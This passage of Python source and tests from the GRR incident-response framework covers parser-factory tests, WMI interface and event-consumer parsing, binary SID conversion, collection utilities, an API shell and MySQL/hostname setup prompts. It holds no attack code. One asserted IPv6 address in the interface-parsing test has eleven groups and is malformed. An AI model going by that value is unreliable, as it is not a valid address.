def testSingleResponseParsers(self):
class FooParser(parser.SingleResponseParser):
supported_artifacts = ["Quux", "Norf"]
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
class BarParser(parser.SingleResponseParser):
supported_artifacts = ["Norf", "Thud"]
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
class BazParser(parser.SingleResponseParser):
supported_artifacts = ["Thud", "Quux"]
def ParseResponse(self, knowledge_base, response, path_type):
raise NotImplementedError()
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Bar", BarParser)
parsers.SINGLE_RESPONSE_PARSER_FACTORY.Register("Baz", BazParser)
quux_factory = parsers.ArtifactParserFactory("Quux")
quux_parsers = quux_factory.SingleResponseParsers()
self.assertCountEqual(map(type, quux_parsers), [FooParser, BazParser])
norf_factory = parsers.ArtifactParserFactory("Norf")
norf_parsers = norf_factory.SingleResponseParsers()
self.assertCountEqual(map(type, norf_parsers), [FooParser, BarParser])
thud_factory = parsers.ArtifactParserFactory("Thud")
thud_parsers = thud_factory.SingleResponseParsers()
self.assertCountEqual(map(type, thud_parsers), [BarParser, BazParser])
@mock.patch.object(parsers, "MULTI_RESPONSE_PARSER_FACTORY",
factory.Factory(parser.MultiResponseParser))
def testMultiResponseParsers(self):
class FooParser(parser.MultiResponseParser):
supported_artifacts = ["Foo"]
def ParseResponses(self, knowledge_base, responses):
raise NotImplementedError()
class BarParser(parser.MultiResponseParser):
supported_artifacts = ["Bar"]
def ParseResponses(self, knowledge_base, responses):
raise NotImplementedError()
parsers.MULTI_RESPONSE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.MULTI_RESPONSE_PARSER_FACTORY.Register("Bar", BarParser)
foo_factory = parsers.ArtifactParserFactory("Foo")
foo_parsers = foo_factory.MultiResponseParsers()
self.assertCountEqual(map(type, foo_parsers), [FooParser])
bar_factory = parsers.ArtifactParserFactory("Bar")
bar_parsers = bar_factory.MultiResponseParsers()
self.assertCountEqual(map(type, bar_parsers), [BarParser])
@mock.patch.object(parsers, "SINGLE_FILE_PARSER_FACTORY",
factory.Factory(parser.SingleFileParser))
def testSingleFileParsers(self):
class FooParser(parser.SingleFileParser):
supported_artifacts = ["Bar"]
def ParseFile(self, knowledge_base, pathspec, filedesc):
raise NotImplementedError()
parsers.SINGLE_FILE_PARSER_FACTORY.Register("Foo", FooParser)
bar_factory = parsers.ArtifactParserFactory("Bar")
bar_parsers = bar_factory.SingleFileParsers()
self.assertCountEqual(map(type, bar_parsers), [FooParser])
baz_factory = parsers.ArtifactParserFactory("Baz")
baz_parsers = baz_factory.SingleFileParsers()
self.assertCountEqual(map(type, baz_parsers), [])
@mock.patch.object(parsers, "MULTI_FILE_PARSER_FACTORY",
factory.Factory(parser.MultiFileParser))
def testMultiFileParsers(self):
class FooParser(parser.MultiFileParser):
supported_artifacts = ["Quux", "Norf"]
def ParseFiles(self, knowledge_base, pathspecs, filedescs):
raise NotImplementedError()
class BarParser(parser.MultiFileParser):
supported_artifacts = ["Quux", "Thud"]
def ParseFiles(self, knowledge_base, pathspecs, filedescs):
raise NotImplementedError()
parsers.MULTI_FILE_PARSER_FACTORY.Register("Foo", FooParser)
parsers.MULTI_FILE_PARSER_FACTORY.Register("Bar", BarParser)
quux_factory = parsers.ArtifactParserFactory("Quux")
quux_parsers = quux_factory.MultiFileParsers()
self.assertCountEqual(map(type, quux_parsers), [FooParser, BarParser])
norf_factory = parsers.ArtifactParserFactory("Norf")
norf_parsers = norf_factory.MultiFileParsers()
self.assertCountEqual(map(type, norf_parsers), [FooParser])
thud_factory = parsers.ArtifactParserFactory("Thud")
thud_parsers = thud_factory.MultiFileParsers()
self.assertCountEqual(map(type, thud_parsers), [BarParser])
if __name__ == "__main__":
flags.StartMain(test_lib.main)
```
#### File: lib/parsers/wmi_parser_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import platform
import unittest
from future.utils import iteritems
from grr_response_core.lib import flags
from grr_response_core.lib.parsers import wmi_parser
from grr_response_core.lib.rdfvalues import anomaly as rdf_anomaly
from grr_response_core.lib.rdfvalues import client_network as rdf_client_network
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_core.lib.rdfvalues import wmi as rdf_wmi
from grr.test_lib import client_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
class WMIParserTest(flow_test_lib.FlowTestsBaseclass):
@unittest.skipIf(
platform.system() == "Darwin",
("IPv6 address strings are cosmetically slightly different on OS X, "
"and we only expect this parsing code to run on Linux or maybe Windows"))
def testInterfaceParsing(self):
parser = wmi_parser.WMIInterfacesParser()
rdf_dict = rdf_protodict.Dict()
mock_config = client_test_lib.WMIWin32NetworkAdapterConfigurationMock
wmi_properties = iteritems(mock_config.__dict__)
for key, value in wmi_properties:
if not key.startswith("__"):
try:
rdf_dict[key] = value
except TypeError:
rdf_dict[key] = "Failed to encode: %s" % value
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 2)
for result in result_list:
if isinstance(result, rdf_client_network.Interface):
self.assertLen(result.addresses, 4)
self.assertCountEqual(
[x.human_readable_address for x in result.addresses], [
"192.168.1.20", "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b:aaaa:1111:aaaa",
"fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b",
"dddd:0:8888:6666:bbbb:aaaa:ffff:bbbb"
])
self.assertCountEqual(
[x.human_readable_address for x in result.dhcp_server_list],
["192.168.1.1"])
self.assertEqual(result.dhcp_lease_expires.AsMicrosecondsSinceEpoch(),
1409008979123456)
self.assertEqual(result.dhcp_lease_obtained.AsMicrosecondsSinceEpoch(),
1408994579123456)
elif isinstance(result, rdf_client_network.DNSClientConfiguration):
self.assertCountEqual(
result.dns_server,
["192.168.1.1", "192.168.255.81", "192.168.128.88"])
self.assertCountEqual(result.dns_suffix, [
"blah.example.com", "ad.example.com", "internal.example.com",
"example.com"
])
def testWMIActiveScriptEventConsumerParser(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["CreatorSID"] = [
1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 152, 18, 57, 8, 206, 29, 80, 44,
70, 38, 82, 8, 244, 1, 0, 0
]
rdf_dict["KillTimeout"] = 0
rdf_dict["MachineName"] = None
rdf_dict["MaximumQueueSize"] = None
rdf_dict["Name"] = "SomeName"
rdf_dict["ScriptFilename"] = None
rdf_dict["ScriptingEngine"] = "VBScript"
rdf_dict["ScriptText"] = r"""Dim objFS, objFile
Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFile = objFS.OpenTextFile("C:\temp.log", 8, true)
objFile.WriteLine "Time: " & Now & "; Entry made by: ASEC"
objFile.WriteLine "Application closed. UserModeTime: " &
TargetEvent.TargetInstance.UserModeTime &_ "; KernelModeTime: " &
TargetEvent.TargetInstance.KernelModeTime & " [hundreds of nanoseconds]"
objFile.Close"""
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
result = result_list[0]
self.assertEqual(result.CreatorSID,
"S-1-5-21-137958040-743448014-139601478-500")
self.assertEqual(result.MaximumQueueSize, 0)
self.assertFalse(result.ScriptFilename)
def testWMIEventConsumerParserDoesntFailOnMalformedSIDs(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
tests = [[1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0], [1, 2, 3], [1], {1: 2}, (1, 2)]
for test in tests:
rdf_dict["CreatorSID"] = test
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
def testWMIEventConsumerParserDoesntFailOnUnknownField(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["NonexistentField"] = "Abcdef"
rdf_dict["Name"] = "Test event consumer"
results = list(parser.Parse(rdf_dict))
self.assertLen(results, 2)
# Anomalies yield first
self.assertEqual(results[0].__class__, rdf_anomaly.Anomaly)
self.assertEqual(results[1].__class__, rdf_wmi.WMIActiveScriptEventConsumer)
def testWMIEventConsumerParser_EmptyConsumersYieldBlank(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
self.assertEqual(True, not result_list[0])
def testWMIEventConsumerParserRaisesWhenNonEmptyDictReturnedEmpty(self):
parser = wmi_parser.WMIActiveScriptEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["NonexistentField"] = "Abcdef"
with self.assertRaises(ValueError):
for output in parser.Parse(rdf_dict):
self.assertEqual(output.__class__, rdf_anomaly.Anomaly)
def testWMICommandLineEventConsumerParser(self):
parser = wmi_parser.WMICommandLineEventConsumerParser()
rdf_dict = rdf_protodict.Dict()
rdf_dict["CommandLineTemplate"] = "cscript KernCap.vbs"
rdf_dict["CreateNewConsole"] = False
rdf_dict["CreateNewProcessGroup"] = False
rdf_dict["CreateSeparateWowVdm"] = False
rdf_dict["CreateSharedWowVdm"] = False
rdf_dict["CreatorSID"] = [
1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 133, 116, 119, 185, 124, 13, 122,
150, 111, 189, 41, 154, 244, 1, 0, 0
]
rdf_dict["DesktopName"] = None
rdf_dict["ExecutablePath"] = None
rdf_dict["FillAttribute"] = None
rdf_dict["ForceOffFeedback"] = False
rdf_dict["ForceOnFeedback"] = False
rdf_dict["KillTimeout"] = 0
rdf_dict["MachineName"] = None
rdf_dict["MaximumQueueSize"] = None
rdf_dict["Name"] = "BVTConsumer"
rdf_dict["Priority"] = 32
rdf_dict["RunInteractively"] = False
rdf_dict["ShowWindowCommand"] = None
rdf_dict["UseDefaultErrorMode"] = False
rdf_dict["WindowTitle"] = None
rdf_dict["WorkingDirectory"] = "C:\\tools\\kernrate"
rdf_dict["XCoordinate"] = None
rdf_dict["XNumCharacters"] = None
rdf_dict["XSize"] = None
rdf_dict["YCoordinate"] = None
rdf_dict["YNumCharacters"] = None
rdf_dict["YSize"] = None
result_list = list(parser.Parse(rdf_dict))
self.assertLen(result_list, 1)
result = result_list[0]
self.assertEqual(result.CreatorSID,
"S-1-5-21-3111613573-2524581244-2586426735-500")
self.assertEqual(result.CommandLineTemplate, "cscript KernCap.vbs")
self.assertEqual(result.Name, "BVTConsumer")
self.assertEqual(result.KillTimeout, 0)
self.assertEqual(result.FillAttribute, 0)
self.assertEqual(result.FillAttributes, 0)
self.assertFalse(result.ForceOffFeedback)
self.assertFalse(result.ForceOnFeedback)
class BinarySIDToStringSIDTest(test_lib.GRRBaseTest):
def assertConvertsTo(self, sid, expected_output):
self.assertEqual(wmi_parser.BinarySIDtoStringSID(sid), expected_output)
def testEmpty(self):
self.assertConvertsTo(b"", u"")
def testSimple(self):
self.assertConvertsTo(b"\x01", u"S-1")
self.assertConvertsTo(b"\x01\x05\x00\x00\x00\x00\x00\x05", u"S-1-5")
self.assertConvertsTo(b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00",
u"S-1-5-21")
def testTruncated(self):
with self.assertRaises(ValueError):
wmi_parser.BinarySIDtoStringSID(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00")
with self.assertRaises(ValueError):
wmi_parser.BinarySIDtoStringSID(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00")
def test5Subauthorities(self):
self.assertConvertsTo(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x85\x74\x77\xb9\x7c"
b"\x0d\x7a\x96\x6f\xbd\x29\x9a\xf4\x01\x00\x00",
u"S-1-5-21-3111613573-2524581244-2586426735-500")
def testLastAuthorityTruncated(self):
with self.assertRaises(ValueError):
wmi_parser.BinarySIDtoStringSID(
b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x85\x74\x77\xb9"
b"\x7c\x0d\x7a\x96\x6f\xbd\x29\x9a\xf4")
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
```
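The SID tests above pin down the binary layout expected by `BinarySIDtoStringSID`: a revision byte, a subauthority-count byte, a 48-bit big-endian identifier authority, then 32-bit little-endian subauthorities. The sketch below is an illustrative re-derivation that reproduces the expected strings from those test vectors; it is not the `wmi_parser` implementation:
```python
def binary_sid_to_string(sid):
    """Converts a binary Windows SID into its S-1-... string form (illustrative)."""
    if not sid:
        return u""
    parts = [u"S-%d" % sid[0]]  # Revision byte.
    if len(sid) >= 8:
        # 48-bit big-endian identifier authority (bytes 2..7).
        parts.append(u"%d" % int.from_bytes(sid[2:8], "big"))
        body = sid[8:]
        if len(body) % 4:
            raise ValueError("Truncated subauthority in SID")
        # 32-bit little-endian subauthorities.
        for i in range(0, len(body), 4):
            parts.append(u"%d" % int.from_bytes(body[i:i + 4], "little"))
    return u"-".join(parts)


assert binary_sid_to_string(b"\x01") == u"S-1"
assert binary_sid_to_string(
    b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x85\x74\x77\xb9"
    b"\x7c\x0d\x7a\x96\x6f\xbd\x29\x9a\xf4\x01\x00\x00"
) == u"S-1-5-21-3111613573-2524581244-2586426735-500"
```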
#### File: lib/util/collection_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from absl.testing import absltest
from future.builtins import range
from grr_response_core.lib.util import collection
class TrimTest(absltest.TestCase):
def testEmpty(self):
lst = []
clipping = collection.Trim(lst, limit=3)
self.assertEqual(lst, [])
self.assertEqual(clipping, [])
def testSomeClipping(self):
lst = [1, 2, 3, 4, 5, 6, 7]
clipping = collection.Trim(lst, limit=4)
self.assertEqual(lst, [1, 2, 3, 4])
self.assertEqual(clipping, [5, 6, 7])
def testNoClipping(self):
lst = [1, 2, 3, 4]
clipping = collection.Trim(lst, limit=10)
self.assertEqual(lst, [1, 2, 3, 4])
self.assertEqual(clipping, [])
def testLimit0(self):
lst = [1, 2, 3]
clipping = collection.Trim(lst, limit=0)
self.assertEqual(lst, [])
self.assertEqual(clipping, [1, 2, 3])
def testLimitNegative(self):
lst = [1, 2, 3]
clipping = collection.Trim(lst, limit=-3)
self.assertEqual(lst, [])
self.assertEqual(clipping, [1, 2, 3])
class GroupTest(absltest.TestCase):
def testEmpty(self):
result = collection.Group([], key=lambda _: None)
expected = {}
self.assertEqual(result, expected)
def testByIdentity(self):
result = collection.Group([3, 2, 1, 1, 5, 3, 1, 5], key=lambda num: num)
expected = {1: [1, 1, 1], 2: [2], 3: [3, 3], 5: [5, 5]}
self.assertEqual(result, expected)
def testByFirstLetter(self):
result = collection.Group(["foo", "bar", "baz"], key=lambda text: text[0])
expected = {"f": ["foo"], "b": ["bar", "baz"]}
self.assertEqual(result, expected)
def testGenerator(self):
def Generate():
yield 4
yield 8
yield 15
yield 16
yield 23
yield 42
result = collection.Group(Generate(), key=lambda num: num % 2)
expected = {0: [4, 8, 16, 42], 1: [15, 23]}
self.assertEqual(result, expected)
class BatchTest(absltest.TestCase):
def testEmpty(self):
batches = list(collection.Batch([], 10))
self.assertEqual(batches, [])
def testUneven(self):
batches = list(collection.Batch(range(10), size=4))
self.assertEqual(batches, [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]])
def testSmallSize(self):
batches = list(collection.Batch([None] * 100, size=1))
self.assertEqual(batches, [[None]] * 100)
def testBigSize(self):
batches = list(collection.Batch([None] * 20, size=100))
self.assertEqual(batches, [[None] * 20])
class StartsWithTest(absltest.TestCase):
def testEmptyStartsWithEmpty(self):
self.assertTrue(collection.StartsWith([], []))
def testNonEmptyStartsWithEmpty(self):
self.assertTrue(collection.StartsWith([1, 2, 3], []))
def testEmptyDoesNotStartWithNonEmpty(self):
self.assertFalse(collection.StartsWith([], [1, 2, 3]))
def testEqual(self):
self.assertTrue(collection.StartsWith([1, 2, 3], [1, 2, 3]))
def testProperPrefix(self):
self.assertTrue(collection.StartsWith([1, 2, 3], [1, 2]))
self.assertTrue(collection.StartsWith([1, 2, 3], [1]))
def testDifferentElement(self):
self.assertFalse(collection.StartsWith([1, 2, 3], [1, 4, 5]))
def testStringList(self):
self.assertTrue(collection.StartsWith(["a", "b", "c"], ["a", "b"]))
def testString(self):
self.assertTrue(collection.StartsWith("foobar", "foo"))
def testNonListIterable(self):
self.assertTrue(collection.StartsWith((5, 4, 3), (5, 4)))
if __name__ == "__main__":
absltest.main()
```
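For reference, the behaviour these tests pin down for `Trim` and `Batch` can be summarised with a small standalone sketch (illustrative only, not the `collection` module itself): `Trim` truncates the list in place and returns the clipping, and `Batch` yields fixed-size chunks with a possibly shorter final chunk:
```python
def trim(lst, limit):
    """Truncates lst in place to at most limit elements and returns the rest."""
    limit = max(0, limit)
    clipping = lst[limit:]
    del lst[limit:]
    return clipping


def batch(iterable, size):
    """Yields lists of at most `size` consecutive items from iterable."""
    current = []
    for item in iterable:
        current.append(item)
        if len(current) == size:
            yield current
            current = []
    if current:
        yield current


lst = [1, 2, 3, 4, 5, 6, 7]
print(trim(lst, limit=4), lst)         # [5, 6, 7] [1, 2, 3, 4]
print(list(batch(range(10), size=4)))  # [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]
```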
#### File: grr_response_server/bin/api_shell_raw_access.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
# pylint: disable=unused-import,g-bad-import-order
from grr_response_server import server_plugins
# pylint: enable=g-bad-import-order
from grr_api_client import api
from grr_api_client import api_shell_lib
from grr_response_core import config
from grr_response_core.config import contexts
from grr_response_core.config import server as config_server
from grr_response_core.lib import flags
from grr_response_server import access_control
from grr_response_server import fleetspeak_connector
from grr_response_server import server_startup
from grr_response_server.bin import api_shell_raw_access_lib
flags.DEFINE_integer(
"page_size", 1000,
"Page size used when paging through collections of items. Default is 1000.")
flags.DEFINE_string(
"username", None, "Username to use when making raw API calls. If not "
"specified, USER environment variable value will be used.")
flags.DEFINE_string(
"exec_code", None,
"If present, no IPython shell is started but the code given in "
"the flag is run instead (comparable to the -c option of "
"IPython). The code will be able to use a predefined "
"global 'grrapi' object.")
flags.DEFINE_string(
"exec_file", None,
"If present, no IPython shell is started but the code given in "
"command file is supplied as input instead. The code "
"will be able to use a predefined global 'grrapi' "
"object.")
def main(argv=None):
del argv # Unused.
if flags.FLAGS.version:
print("GRR API shell {}".format(config_server.VERSION["packageversion"]))
return
config.CONFIG.AddContext(contexts.COMMAND_LINE_CONTEXT)
config.CONFIG.AddContext(contexts.CONSOLE_CONTEXT,
"Context applied when running the console binary.")
server_startup.Init()
fleetspeak_connector.Init()
username = flags.FLAGS.username
if not username:
username = os.environ["USER"]
if not username:
print("Username has to be specified with either --username flag or "
"USER environment variable.")
sys.exit(1)
grrapi = api.GrrApi(
connector=api_shell_raw_access_lib.RawConnector(
token=access_control.ACLToken(username=username),
page_size=flags.FLAGS.page_size))
if flags.FLAGS.exec_code and flags.FLAGS.exec_file:
print("--exec_code --exec_file flags can't be supplied together.")
sys.exit(1)
elif flags.FLAGS.exec_code:
# pylint: disable=exec-used
exec (flags.FLAGS.exec_code, dict(grrapi=grrapi))
# pylint: enable=exec-used
elif flags.FLAGS.exec_file:
api_shell_lib.ExecFile(flags.FLAGS.exec_file, grrapi)
else:
api_shell_lib.IPShell([sys.argv[0]], user_ns=dict(grrapi=grrapi))
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/bin/config_updater_util.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import getpass
import os
import re
import socket
import subprocess
import sys
import time
# Usually we import concrete items from the builtins module. However, here we
# use `builtins.input` which is stubbed in the test, so we have to always use
# qualified version.
from future import builtins
from future.moves.urllib import parse as urlparse
from future.utils import iteritems
import MySQLdb
from MySQLdb.constants import CR as mysql_conn_errors
from MySQLdb.constants import ER as general_mysql_errors
import pkg_resources
from typing import Optional, Text
# pylint: disable=unused-import,g-bad-import-order
from grr_response_server import server_plugins
# pylint: enable=g-bad-import-order,unused-import
from grr_api_client import api
from grr_api_client import errors as api_errors
from grr_response_core import config as grr_config
from grr_response_core.lib import repacking
from grr_response_server import access_control
from grr_response_server import maintenance_utils
from grr_response_server import server_startup
from grr_response_server import signed_binary_utils
from grr_response_server.bin import api_shell_raw_access_lib
from grr_response_server.bin import config_updater_keys_util
from grr_response_server.gui.api_plugins import user as api_user
from grr_response_server.rdfvalues import objects as rdf_objects
try:
# Importing readline enables the raw_input calls to have history etc.
import readline # pylint: disable=unused-import,g-bad-import-order,g-import-not-at-top
except ImportError:
# readline is not bundled with Python on Windows. Simply ignoring failing
# import then.
pass
# These control retry behavior when checking that GRR can connect to
# MySQL during config initialization.
_MYSQL_MAX_RETRIES = 2
_MYSQL_RETRY_WAIT_SECS = 2
# Python hacks or executables larger than this limit will not be uploaded.
_MAX_SIGNED_BINARY_BYTES = 30 << 20 # 30 MiB
# Batch size to use when fetching multiple items from the GRR API.
_GRR_API_PAGE_SIZE = 1000
class ConfigInitError(Exception):
"""Exception raised to abort config initialization."""
def __init__(self):
super(ConfigInitError, self).__init__(
"Aborting config initialization. Please run 'grr_config_updater "
"initialize' to retry initialization.")
class BinaryTooLargeError(Exception):
"""Exception raised when trying to upload overly large binaries."""
class UserAlreadyExistsError(Exception):
"""Exception raised when trying to create an already-existing user."""
class UserNotFoundError(Exception):
"""Exception raised when trying to fetch a non-existent user."""
def __init__(self, username):
super(UserNotFoundError,
self).__init__("User '%s' does not exist." % username)
def ImportConfig(filename, config):
"""Reads an old config file and imports keys and user accounts."""
sections_to_import = ["PrivateKeys"]
entries_to_import = [
"Client.executable_signing_public_key", "CA.certificate",
"Frontend.certificate"
]
options_imported = 0
old_config = grr_config.CONFIG.MakeNewConfig()
old_config.Initialize(filename)
for entry in old_config.raw_data:
try:
section = entry.split(".")[0]
if section in sections_to_import or entry in entries_to_import:
config.Set(entry, old_config.Get(entry))
print("Imported %s." % entry)
options_imported += 1
except Exception as e: # pylint: disable=broad-except
print("Exception during import of %s: %s" % (entry, e))
return options_imported
def RetryQuestion(question_text, output_re="", default_val=None):
"""Continually ask a question until the output_re is matched."""
while True:
if default_val is not None:
new_text = "%s [%s]: " % (question_text, default_val)
else:
new_text = "%s: " % question_text
# pytype: disable=wrong-arg-count
output = builtins.input(new_text) or str(default_val)
# pytype: enable=wrong-arg-count
output = output.strip()
if not output_re or re.match(output_re, output):
break
else:
print("Invalid input, must match %s" % output_re)
return output
def RetryBoolQuestion(question_text, default_bool):
if not isinstance(default_bool, bool):
raise ValueError(
"default_bool should be a boolean, not %s" % type(default_bool))
default_val = "Y" if default_bool else "N"
prompt_suff = "[Yn]" if default_bool else "[yN]"
return RetryQuestion("%s %s: " % (question_text, prompt_suff), "[yY]|[nN]",
default_val)[0].upper() == "Y"
def ConfigureHostnames(config, external_hostname = None):
"""This configures the hostnames stored in the config."""
if not external_hostname:
try:
external_hostname = socket.gethostname()
except (OSError, IOError):
print("Sorry, we couldn't guess your hostname.\n")
external_hostname = RetryQuestion(
"Please enter your hostname e.g. "
"grr.example.com", "^[\\.A-Za-z0-9-]+$", external_hostname)
print("""\n\n-=Server URL=-
The Server URL specifies the URL that the clients will connect to
communicate with the server. For best results this should be publicly
accessible. By default this will be port 8080 with the URL ending in /control.
""")
frontend_url = RetryQuestion("Frontend URL", "^http://.*/$",
"http://%s:8080/" % external_hostname)
config.Set("Client.server_urls", [frontend_url])
frontend_port = urlparse.urlparse(frontend_url).port or grr_config.CONFIG.Get(
"Frontend.bind_port")
config.Set("Frontend.bind_port", frontend_port)
print("""\n\n-=AdminUI URL=-:
The UI URL specifies where the Administrative Web Interface can be found.
""")
ui_url = RetryQuestion("AdminUI URL", "^http[s]*://.*$",
"http://%s:8000" % external_hostname)
config.Set("AdminUI.url", ui_url)
ui_port = urlparse.urlparse(ui_url).port or grr_config.CONFIG.Get(
"AdminUI.port")
config.Set("AdminUI.port", ui_port)
def CheckMySQLConnection(db_options):
"""Checks whether a connection can be established to MySQL.
Args:
db_options: A dict mapping GRR MySQL config options to their values.
Returns:
A boolean indicating whether a connection could be made to a MySQL server
instance with the given options.
"""
for tries_left in range(_MYSQL_MAX_RETRIES, -1, -1):
try:
connection_options = dict(
host=db_options["Mysql.host"],
port=db_options["Mysql.port"],
db=db_options["Mysql.database_name"],
user=db_options["Mysql.database_username"],
passwd=db_options["Mysql.database_password"],
charset="utf8")
ssl_enabled = "Mysql.client_key_path" in db_options
if ssl_enabled:
connection_options["ssl"] = {
"key": db_options["Mysql.client_key_path"],
"cert": db_options["Mysql.client_cert_path"],
"ca": db_options["Mysql.ca_cert_path"],
}
connection = MySQLdb.connect(**connection_options)
if ssl_enabled:
cursor = connection.cursor()
cursor.execute("SHOW VARIABLES LIKE 'have_ssl'")
res = cursor.fetchone()
if res[0] == "have_ssl" and res[1] == "YES":
print("SSL enabled successfully.")
else:
print("Unable to establish SSL connection to MySQL.")
return False
return True
except MySQLdb.OperationalError as mysql_op_error:
if len(mysql_op_error.args) < 2:
# We expect the exception's arguments to be an error-code and
# an error message.
print("Unexpected exception type received from MySQL. %d attempts "
"left: %s" % (tries_left, mysql_op_error))
time.sleep(_MYSQL_RETRY_WAIT_SECS)
continue
if mysql_op_error.args[0] == mysql_conn_errors.CONNECTION_ERROR:
print("Failed to connect to MySQL. Is it running? %d attempts left." %
tries_left)
elif mysql_op_error.args[0] == mysql_conn_errors.UNKNOWN_HOST:
print("Unknown-hostname error encountered while trying to connect to "
"MySQL.")
return False # No need for retry.
elif mysql_op_error.args[0] == general_mysql_errors.BAD_DB_ERROR:
# GRR db doesn't exist yet. That's expected if this is the initial
# setup.
return True
elif mysql_op_error.args[0] in (
general_mysql_errors.ACCESS_DENIED_ERROR,
general_mysql_errors.DBACCESS_DENIED_ERROR):
print("Permission error encountered while trying to connect to "
"MySQL: %s" % mysql_op_error)
return False # No need for retry.
else:
print("Unexpected operational error encountered while trying to "
"connect to MySQL. %d attempts left: %s" % (tries_left,
mysql_op_error))
except MySQLdb.Error as mysql_error:
print("Unexpected error encountered while trying to connect to MySQL. "
"%d attempts left: %s" % (tries_left, mysql_error))
time.sleep(_MYSQL_RETRY_WAIT_SECS)
return False
def ConfigureMySQLDatastore(config):
"""Prompts the user for configuration details for a MySQL datastore."""
print("GRR will use MySQL as its database backend. Enter connection details:")
datastore_init_complete = False
db_options = {}
while not datastore_init_complete:
db_options["Datastore.implementation"] = "MySQLAdvancedDataStore"
db_options["Mysql.host"] = RetryQuestion("MySQL Host", "^[\\.A-Za-z0-9-]+$",
config["Mysql.host"])
db_options["Mysql.port"] = int(
RetryQuestion("MySQL Port (0 for local socket)", "^[0-9]+$",
config["Mysql.port"]))
db_options["Mysql.database_name"] = RetryQuestion(
"MySQL Database", "^[A-Za-z0-9-]+$", config["Mysql.database_name"])
db_options["Mysql.database_username"] = RetryQuestion(
"MySQL Username", "[A-Za-z0-9-@]+$", config["Mysql.database_username"])
# TODO(hanuszczak): Incorrect type specification for `getpass`.
# pytype: disable=wrong-arg-types
db_options["Mysql.database_password"] = getpass.getpass(
prompt="Please enter password for database user %s: " %
db_options["Mysql.database_username"])
# pytype: enable=wrong-arg-types
use_ssl = RetryBoolQuestion("Configure SSL connections for MySQL?", False)
if use_ssl:
db_options["Mysql.client_key_path"] = RetryQuestion(
"Path to the client private key file",
default_val=config["Mysql.client_key_path"])
db_options["Mysql.client_cert_path"] = RetryQuestion(
"Path to the client certificate file",
default_val=config["Mysql.client_cert_path"])
db_options["Mysql.ca_cert_path"] = RetryQuestion(
"Path to the CA certificate file",
default_val=config["Mysql.ca_cert_path"])
if CheckMySQLConnection(db_options):
print("Successfully connected to MySQL with the provided details.")
datastore_init_complete = True
else:
print("Error: Could not connect to MySQL with the provided details.")
should_retry = RetryBoolQuestion(
"Re-enter MySQL details? Answering 'no' will abort config "
"initialization: ", True)
if should_retry:
db_options.clear()
else:
raise ConfigInitError()
for option, value in iteritems(db_options):
config.Set(option, value)
def ConfigureDatastore(config):
"""Guides the user through configuration of the datastore."""
print("\n\n-=GRR Datastore=-\n"
"For GRR to work each GRR server has to be able to communicate with\n"
"the datastore. To do this we need to configure a datastore.\n")
existing_datastore = grr_config.CONFIG.Get("Datastore.implementation")
if not existing_datastore or existing_datastore == "FakeDataStore":
ConfigureMySQLDatastore(config)
return
print("Found existing settings:\n Datastore: %s" % existing_datastore)
if existing_datastore == "SqliteDataStore":
set_up_mysql = RetryBoolQuestion(
"The SQLite datastore is no longer supported. Would you like to\n"
"set up a MySQL datastore? Answering 'no' will abort config "
"initialization.", True)
if set_up_mysql:
print("\nPlease note that no data will be migrated from SQLite to "
"MySQL.\n")
ConfigureMySQLDatastore(config)
else:
raise ConfigInitError()
elif existing_datastore == "MySQLAdvancedDataStore":
print(" MySQL Host: %s\n MySQL Port: %s\n MySQL Database: %s\n"
" MySQL Username: %s\n" %
(grr_config.CONFIG.Get("Mysql.host"),
grr_config.CONFIG.Get("Mysql.port"),
grr_config.CONFIG.Get("Mysql.database_name"),
grr_config.CONFIG.Get("Mysql.database_username")))
if grr_config.CONFIG.Get("Mysql.client_key_path"):
print(" MySQL client key file: %s\n"
" MySQL client cert file: %s\n"
" MySQL ca cert file: %s\n" %
(grr_config.CONFIG.Get("Mysql.client_key_path"),
grr_config.CONFIG.Get("Mysql.client_cert_path"),
grr_config.CONFIG.Get("Mysql.ca_cert_path")))
if not RetryBoolQuestion("Do you want to keep this configuration?", True):
ConfigureMySQLDatastore(config)
def ConfigureUrls(config, external_hostname = None):
